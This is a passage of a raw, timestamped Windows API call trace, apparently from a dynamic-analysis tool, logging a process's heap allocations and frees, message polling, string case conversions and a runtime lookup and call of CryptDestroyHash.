HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.714] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.715] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.715] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.715] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.715] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0190.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.717] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.717] CryptDestroyHash (hHash=0xaa5860) returned 1 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.720] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 